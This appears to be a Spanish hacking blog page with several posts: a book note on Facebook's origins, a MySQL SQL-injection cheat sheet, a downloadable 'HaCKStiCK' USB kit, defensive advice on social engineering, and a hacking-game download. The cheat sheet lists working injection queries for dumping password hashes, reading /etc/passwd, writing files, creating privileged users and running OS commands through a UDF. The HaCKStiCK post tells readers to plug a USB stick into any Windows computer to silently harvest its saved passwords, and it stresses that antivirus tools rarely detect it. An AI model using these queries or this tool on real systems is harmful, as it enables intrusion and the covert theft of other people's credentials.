The Social Network

Era inevitable que tarde o temprano alguien escribiera algo sobre la creación de una de los proyectos mas revolucionarios de los últimos tiempos. Hablo del libro «Multimillonarios por accidente: El nacimiento de Facebook. Una historia de Sexo, Dinero, Talento y Traición«(amazon.com), de Ben Mezrich. En este libro se relatan los años universitarios de Mark Zuckerberg relacionados con la creación de Facebook, el cual en un principio no era más que una recopilación de las fotografías de los miembros de las residencias de Harvard a modo de anuario. Lo que hasta hace unos días me hacía revolver las neuronas era el motivo del estallido que tubo una web de este tipo, propagándose a tal velocidad y a tan gran escala sin inversión de marketing ni nada por el estilo, pues suponía que en un principio solo subirían su foto a este sistema inicial un número reducido de miembros, que serían los amiguetes del Zuckerberg, pero me equivocaba por completo. Zuckerberg consiguió tener publicadas en su web las fotos de absolutamente todos los miembros de residencias antes mentados, sin su consentimiento inicial, obteniendo las fotos por medio de sus conocimientos sobre seguridad informática a través de las páginas de las residencias.

El propio Mark llevaba un blog en el que detallaría todas sus peripecias y acciones en todos los servidores de las residencias, cómo accedía a ellos, que mecanismos tuvo que romper, dificultades que se encontraba, número de cervezas que llevaba según tecleaba, etc.

Podréis encontrar más información acerca de estas actividades en SecurityByDefault
Parece que como todo en esta vida el esfuerzo siempre es recompensado, de una manera o de otra, siempre y cuando te encuentres FUERA de españa, claro.
Aquí el trailer de la película basada en el libro anteriormente citado:

1

Tabla de Trucos para Inyección de SQL

Versión SELECT @@version
Comentarios SELECT 1; #comentario
SELECT /*comentario*/1;
Usuario Actual SELECT user();
SELECT system_user();
Listar Usuarios SELECT user FROM mysql.user; — priv
Listar Hashes de Passwords SELECT host, user, password FROM mysql.user; — priv
Crackear Passwords John the Ripper crackea hashes de MySQL.
Listar privilegios SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
Listar cuentas DBA SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;
SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv
Base de Datos Actual SELECT database()
Listar Bases de Datos SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
Listar Columnas SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Listar Tablas SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Encontrar Tablas apartir de un nombre de Columna SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — en cuentra las tablas con columnas llamadas ‘username’
Seleccionar la N Fila SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # filas numeradas desde 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # filas numeradas desde 0
Seleccionar el N caracter SELECT substr(‘abcd’, 3, 1); # devuelve c
AND Bit a Bit SELECT 6 & 2; # devuelve 2
SELECT 6 & 1; # devuelve 0
Valor ASCII -> Caracter SELECT char(65); # devuelve A
Char -> ASCII Value SELECT ascii(‘A’); # returns 65
Casting SELECT cast(‘1′ AS unsigned integer);
SELECT cast(‘123′ AS char);
Concatenación de cadenas SELECT CONCAT(‘A’,’B’); #devuelve AB
SELECT CONCAT(‘A’,’B’,’C’); # devuelve ABC
Sentencia IF SELECT if(1=1,’foo’,’bar’); — devuelve ‘foo’
Sentencia CASE SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # devuelve A
Evitar Comillas SELECT 0×414243; # devuelve ABC
Demora de Tiempo SELECT BENCHMARK(1000000,MD5(‘A’));
SELECT SLEEP(5); # >= 5.0.12
Hacer Peticiones DNS ¿Imposible?
Ejecución de Comandios Si mysqld (<5.0) se ejecuta como root Y te haces con una cuenta DBA podrás ejecutar comandos del SO subiendo un archivo compartido a /usr/lib(o similar). El archivo .so debe contener una Función de Usuario Definida (UDF). raptor_udf.c explica exactamente como puedes hacerlo. Recuerda compilar para la arquitectura del objetivo pues no tiene porque ser la misma que la del atacante.
Acceso a Archivos Locales …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, solo puede leer archivos de lectura universales.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, escribir en archivo de sistema
Hostname, Dirección IP ¿Imposible?
Crear Usuarios CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv
Borrar Usuarios DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv
Localización de los archivos de BD SELECT @@datadir;
Default/System Databases information_schema (>= mysql 5.0)
mysql
1

HaCKStiCK

hacking
Descarga el archivo que hay más abajo y sigue las instrucciones que vienen a continuación, para descubrir lo vulnerable que es nuestra información ante cualquier persona malintencionada:
-Descomprime el archivo en una memoria USB
-Introduce la memoria en cualquier ordenador con Windows.
-Se creará en la memoria USB una subcarpeta en «/Dump/» con el nombre del equipo.
-Dentro de esta encontrarás diversos archivos en formato html con información del tipo:

Contraseñas de Messenger

Contraseñas de Internet Explorer

Contraseñas de Firefox

Contraseñas de Outlook

Contraseñas de las redes Wireless

Puertos Abiertos

Información Relevante sobre el equipo

-Por cada equipo diferente en el que introduzcas la memoria se creará una carpeta diferente
NO ES UN KEYLOGGER. Las contraseñas se consiguen EN EL ACTO, no hay que esperar a que nadie las escriba, tan solo que las contraseñas estén guardadas en el equipo (Tipo «Recordar Contraseña»). TAMPOCO es un TROYANO. No deja ni rastro en el equipo, y no es detectado por la mayoría de los ANTIVIRUS. Un Firewall, en todo caso, lo detectaría como MALWARE.
Ni que decir tiene que es uno de los archivos más utiles que he puesto en esta web, XD

DESCARGAR

Las utilidades utilizadas en esta compilación, y muchas más, las podreis encontrar en http://www.nirsoft.net/

Protégete de ataques de este tipo utilizando: Comodo Free Firewall

1

Ingeniería Social

La ingeniería social intenta por medio de todo tipo de artimañanas que desvelemos información privada o incluso que realicemos acciones perjudiciales para nosotros mismos. Dicho de otra manera: que intentan que tú mismo reveles tu contraseña haciéndote creer que quien te la pide es de fiar, o que ejecutes un virus que va a dejar tu computadora más lenta que una tortuga con muletas diciéndote que lo que contiene el archivo es de tu interés.

Uno de los ejemplos más claros de ingeniería social son los virus que llegan por correo electrónico. Normalmente, el asunto del mail que nos llega hace referencia a algo que suele ser de interés general o, al menos, bastante extendido. Junto con el correo, nos viene un archivo que se supone hace referencia al asunto y entonces es cuando picamos: nos descargamos el archivo, lo abrimos y ¡ta-ta-tachín! contagiados vete tú a saber por que cosa. En otras ocasiones, se nos incluye un enlace a un sitio web y al entrar en él se produce la descarga del virus o cualquier otro tipo de malware.

La ingeniería social también se aplica para realizar phishing: hacerse pasar por una persona o por una empresa de confianza para obtener los datos sensibles del usuario (como las contraseñas). El phishing es realizado en ocasiones de manera muy elaborada, enviando enlaces a sitios que se parecen a aquellos con los que mantenemos relación de algún tipo pero que en realidad no son quienes dicen ser.

No se necesitan grandes medios informáticos para robar información. En muchas ocasiones, somos nosotros mismos quienes la proporcionamos sin darnos cuenta. Esta tira de Vergara es un ejemplo muy claro de a lo que me refiero:

El usuario siempre es el eslabón más débil en una cadena de seguridad informática, por lo tanto siempre es el primero que es atacado. Algunos consejos para evitar los efectos de un ataque efectuado mediante ingeniería social son:

  • No confíes en los desconocidos: sí, sí, lo que te decían papá y mamá es más cierto que nunca en Internet. Si bien hoy en día, cuando las relaciones sociales se amplían por medio de la red, puede parecer que esto es muy difícil de llevar a cabo sin quedarse aislado de las diversas comunidades de usuarios, piensa que ahora la palabra “desconocido” ha entrado en una redefinición. Todos somos extraños para todos en un principio, pero siempre tenemos alguna referencia que nos diga algo acerca de una persona: un conocido que nos habló de él, un blog, comentarios en foros, participaciones en listas de correo, etc. Un par de búsquedas en Google o Yahoo! te pueden ayudar a identificar al desconocido que se ha puesto en contacto contigo y saber si es de fiar.
  • Cuidado con los datos que das y donde los das: mira la tira de más arriba y saca tus conclusiones. En general, cuanto más generalistas las preguntas y menos ajustadas a un tema en concreto, menos fiables suelen ser.
  • Utiliza contraseñas largas pero fáciles de recordar: y que no estén relacionadas con tus datos personales u otros que difundas habitualmente. No, el nombre de tu mascota no es una buena contraseña. Mucho menos tu lugar y fecha de nacimiento. Tampoco tu libro favorito, ni tu actor, ni tu cantante.
  • No abras o descargues archivos adjuntos de desconocidos: y mucho menos si el mensaje no está en tu idioma, diga lo que diga. Sin embargo, el peligro no viene del extranjero, ni mucho menos. Ten cuidado con todo lo que te envíe un absoluto desconocido del cual no tengas referencia alguna. Si alguien que no conoces te quiere enviar algo que no has pedido, por lógica te pedirá permiso primero. Si no lo hace, desconfía en más de un sentido.
  • Ningún banco te va a pedir tu contraseña por correo electrónico: ninguno. Ni te va a pedir información personal para la actualización de su base de datos.
  • Si se refiere a asuntos de dinero, fíjate en la dirección: la dirección de todos los sitios de bancos o de transacciones por Internet empieza por https:// y no por http://. Fíjate en la s, pues indica que estás en un sitio seguro.
  • Sigue blogs o sitios que divulguen tretas de ingeniería social: como por ejemplo el laboratorio de Eset Latinoamérica o Rompecadenas, todo un clásico es este aspecto.
1

Hacker Evolution (2007)

hackerevolution2

Hacker Evolution es un juego que nos pone en una situación futura catastrófica:
Las finanzas digitales se han colapsado y los gobiernos sospechan que se trata de un hacker. La única forma de atraparlo es utilizando a un antiguo agente del gobierno con altos conocimientos infórmaticos.

Ese eres tu.

hackerevolution1

Deberas utilizar tu consola de administración para ir superando obstáculos y llegar a esclarecer la verdad. Y además, lo harás de forma literal, porque el juego se controla como si de un hacker se tratase: con comandos desde una consola hacia servidores. Aunque el juego es muy simple gráficamente, su mecánica de juego es muy atractiva, ya que cada uno de los servers que tengas que «hackear» te ofrecerá todo un desafío a tu inteligencia. Utiliza toda clase de comandos para introducirte en ellos antes de que localicen tu ubicación, momento en el que se acabará tu partida.
Lo mejor, sin duda, la música que te ofrece un impresionante repertorio de melodías mientras intentas coger al que ha provocado el colapso financiero mundial.

Descargar
Pass: altocielo.es
1